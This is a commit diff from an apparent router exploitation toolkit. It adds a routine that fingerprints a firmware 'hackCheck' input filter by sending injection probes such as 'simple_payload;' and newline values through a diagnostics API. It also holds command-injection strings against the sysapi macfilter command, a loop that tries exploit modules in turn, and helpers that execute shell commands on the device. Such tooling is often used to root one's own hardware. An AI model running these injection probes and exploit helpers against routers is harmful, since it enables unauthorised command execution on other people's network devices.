gateway: Add detecting version of hackCheck

pull/86/head
remittor 8 months ago
parent 71ed2e9808
commit 755258d882

@ -51,6 +51,10 @@ if gw.model_id > 0 and gw.model_id < gw.get_modelid_by_name('R2100'):
if True:
# init gw and check ssh
gw = create_gateway(timeout = 4, die_if_sshOk = True, die_if_ftpOk = True, web_login = True)
hackCheck = gw.detect_hackCheck(update = True)
if hackCheck:
print(f'hackCheck version =', hackCheck)
exp_modules = [
'connect6', # arn_switch/start_binding
@ -60,6 +64,9 @@ if True:
try:
import_module(mod_name, gw)
break # Ok
except ExploitFixed as e:
print('WARN:', str(e))
continue # try next module
except ExploitNotWorked as e:
print('WARN:', str(e))
continue # try next module

@ -54,7 +54,7 @@ int32_t run_sysapi_macfilter(char* mac, int32_t wan_block)
"""
vuln_cmd = "/usr/sbin/sysapi macfilter set mac=;; wan=no;/usr/sbin/sysapi macfilter commit"
max_cmd_len = 100 - 1 - len(vuln_cmd)
hackCheck = False
hackCheck = gw.detect_hackCheck()
def exec_smart_cmd(cmd, timeout = 7, api = 'API/xqsmarthome/request_smartcontroller'):
######
@ -220,11 +220,13 @@ def exec_cmd(command, fn = '/tmp/e', run_as_sh = True):
exec_tiny_cmd(f"sh {fn}")
if hackCheck >= 3:
raise ExploitFixed(f'Exploits "Smartcontroller" are not usable (hackCheck:{hackCheck})')
# Test smartcontroller interface
res = get_all_scenes()
# Detect using hackCheck fix
hackCheck = False
res = exec_smart_command("aaaaa;$", ignore_err_code = 2)
if isinstance(res, dict):
if res['msg'] != 'api not exists':
@ -232,7 +234,7 @@ if isinstance(res, dict):
else:
if 'Internal Server Error' in res:
print(f'Detect using xiaoqiang "hackCheck" fix ;-)')
hackCheck = True
#hackCheck = 1
else:
raise ExploitNotWorked(f'Smartcontroller return Error: {res}')

@ -31,6 +31,8 @@ from multiprocessing import shared_memory
import xqmodel
class ExploitFixed(Exception): pass
class ExploitError(Exception): pass
class ExploitNotWorked(Exception): pass
@ -79,6 +81,7 @@ class Gateway():
self.login = 'root' # default username
self.user_agent = "curl/8.4.0"
self.last_resp_text = None
self.hackCheck = None
def __init__(self, timeout = 4, verbose = 2, detect_device = True, detect_ssh = True, load_cfg = True):
random.seed()
@ -145,7 +148,7 @@ class Gateway():
try:
dres = json.loads(response.text)
except Exception:
raise RuntimeError(f'Received inccorrect JSON from "{path}" => {response.text}')
raise RuntimeError(f'Received incorrect JSON from "{path}" => {response.text}')
return dres
return response
#return response.status_code, response.content
@ -357,18 +360,62 @@ class Gateway():
resp = self.get_diag_paras(timeout = timeout)
return str(resp['iperf_test_thr'])
def set_diag_iperf_test_thr(self, iperf_test_thr, timeout = None):
def set_diag_paras(self, iperf_test_thr=20, usb_read_thr=0, usb_write_thr=0, disk_read_thr=0, disk_write_thr=0, timeout=None):
params = {
'iperf_test_thr': str(iperf_test_thr),
'usb_read_thr': 0,
'usb_write_thr': 0,
'disk_read_thr': 0,
'disk_write_thr': 0,
'usb_read_thr': str(usb_read_thr),
'usb_write_thr': str(usb_write_thr),
'disk_read_thr': str(disk_read_thr),
'disk_write_thr': str(disk_write_thr),
}
dres = self.api_request('API/xqnetwork/diag_set_paras', params, timeout = timeout)
if not dres or dres['code'] != 0:
raise RuntimeError(f'Error on exec command "diag_set_paras" => {dres}')
return True
if not dres:
err = f'Error on exec command "diag_set_paras" => {dres} (status:{self.last_resp_code})'
if self.last_resp_code == 500: # Internal Server Error
raise EOFError(err)
raise RuntimeError(err)
return dres['code'] # 0 if OK
def set_diag_iperf_test_thr(self, value, timeout = None):
code = self.set_diag_paras(iperf_test_thr = value, timeout = timeout)
return True if code == 0 else False
hackCheck_skipKeys_v1 = [ "ssid", "pwd", "password", "username" ]
hackCheck_skipKeys_v2 = [
"name", "password", "password5g", "password5g2", "npassword", "pppoeName",
"pppoePwd", "pwd", "pwd1", "pwd2", "pwd3", "newPwd", "service", "ssid", "ssid1", "ssid2", "ssid3",
"ssid5g", "ssid5g2", "nssid", "nssid5G", "nssid5G2", "username", "apn", "pdp", "user", "passwd",
"contact_phone", "phoneList", "msgtext", "acs_username", "acs_password", "conn_username", "conn_password",
]
def detect_hackCheck(self, update = False):
if not update and self.hackCheck is not None:
return self.hackCheck
self.hackCheck = 0
self.set_diag_paras(iperf_test_thr = 25, usb_write_thr = 0, usb_read_thr = 0)
try:
code = self.set_diag_paras(iperf_test_thr = 25, usb_write_thr = 'simple_payload\n')
except EOFError: # Internal Server Error
self.hackCheck = 3 # XQSecureUtil.filterChars = "[=[\n[`;|$&\n]]=]" ; return nil
return self.hackCheck
try:
code = self.set_diag_paras(iperf_test_thr = 25, usb_write_thr = 'simple_payload;', usb_read_thr = 0)
except EOFError: # Internal Server Error
self.hackCheck = 2 # XQSecureUtil.filterChars = "[`;|$&]" ; return nil
return self.hackCheck
code = self.set_diag_paras(iperf_test_thr = 'simple_payload;', usb_write_thr = 11, usb_read_thr = 22)
if code != 0:
raise RuntimeError(f'Error on exec command "diag_set_paras" => code:{code} (status:{self.last_resp_code})')
diag_paras = self.get_diag_paras()
#print(f'diag_paras: {diag_paras}')
# restore def values
self.set_diag_paras(iperf_test_thr = 25, usb_write_thr = 0, usb_read_thr = 0)
if isinstance(diag_paras['iperf_test_thr'], int) and diag_paras['iperf_test_thr'] == 25:
self.hackCheck = 1 # XQSecureUtil.filterChars = "[`;|$&]" ; return ''
return self.hackCheck
# hackCheck not detected
return self.hackCheck
def wait_shutdown(self, timeout, verbose = 1):
if verbose:

Loading…
Cancel
Save